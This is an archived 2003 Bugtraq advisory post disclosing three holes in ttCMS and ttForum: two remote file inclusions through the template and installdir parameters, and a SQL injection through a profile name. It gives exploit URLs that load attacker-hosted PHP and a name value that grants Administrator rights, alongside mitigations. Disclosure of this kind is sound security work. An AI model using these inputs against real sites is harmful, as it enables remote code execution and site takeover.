lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 9 May 2003 16:58:36 -0000
From: Charles Reinold <creinold@...mail.com>
To: bugtraq@...urityfocus.com
Subject: ttcms and ttforum exploits




hope this is the right place to send this exploit info, I found three 
diffrent exploits for a forum software / cms software:
--------------------------------------------------------------------------
----------------------------------------------------------------------

Affected Product: ttCMS or ttForum
Affected Versions: ttCMS 2.2, (possibly more) all versions of ttForum.

Description of exploit:
Open up modules/forum/News.php (ttCMS) or News.php (ttForum).
As you can see, this line:
      include($template . '.' . $ext);
Includes a file directly from the user input.

Here's an example exploit URL:
http://www.yourserver.com/ttforum/index.php?
action=news;board=1;template=http://www.yourserver.com/modules/forum/helpa
dmin;ext=help

As you can see, it's possible to execute remote code using this hole.

Possible solutions:
Install YaBB SE 1.5.2.  While ttForum is a derivative of YaBB SE, this 
hole does not exist there.
Upgrade to a newer version of ttForum/ttCMS that fixes the hole.  (none 
is yet available.)
Use a different forum and/or CMS software.

--------------------------------------------------------------------------
----------------------------------------------------------------------

Affected Product: ttCMS or ttForum
Affected Versions: ttCMS 2.2, (possibly more) all versions of ttForum.

Description of exploit:
Open up modules/forum/src/Profile.php (ttCMS) or src/Profile.php 
(ttForum).
As you can see, this line:
      foreach ($HTTP_POST_VARS as $key => $value) {
    $member[$key] = str_replace(array('&', '"', '<', '>'), array
('&amp;', '&quot;', '&lt;', '&gt;'), trim($value));
Parses out ", <, >, and &.  It, however, does not parse out a SINGLE 
quote.

Now scroll down.
SET $queryPasswdPart $customTitlePart realName='$member[name]', 

As you can see, simply setting your name to "me' 
memberGroup='Administrator" would make you an Administrator on any server 
that had magic_quotes_gpc off.

As you can see from the php.ini-recommended file:
; - magic_quotes_gpc = Off        [Performance]

They recommend it off, and thus a multitude of servers have it off, 
enabling this hole.

Possible solutions:
Install YaBB SE 1.5.2.  While ttForum is a derivative of YaBB SE, this 
hole does not exist there.
Upgrade to a newer version of ttForum/ttCMS that fixes the hole.  (none 
is yet available.)
Use a different forum and/or CMS software.

--------------------------------------------------------------------------
----------------------------------------------------------------------

Title:   ttForum / ttCMS, remote command execution.
Application:   ttForum up to 1.1, ttCMS 2.2Platform(s):   Unix 
Technical description:
----------------------
Everybody can inject PHP code in ttForum/ttCMS through the 
ttForumInstaller. The Installer (which can be found in 
the /modules/forumdirectory in ttCMS) includes the Forum-Settings 
throughinclude("$installdir/Settings.php") where $installdir istaken from 
a Form.In order to exploit this vulnerability, all you have to do is 
tocreate a File "Settings.php" on your own webserver which containsthe 
code you want to execute on the target-system. If you now callthe 
install.php-File with the following parameters:http://target-
system/install.php?step=7&installdir=http://yourserver/the code in 
Settings.php will be injected.

Recommendations:
----------------
Delete install.php AS SOON AS POSSIBLE or use YaBB SE 1.5.2 (ttForumis a 
derivate of YaBB SE)


Powered by blists - more mailing lists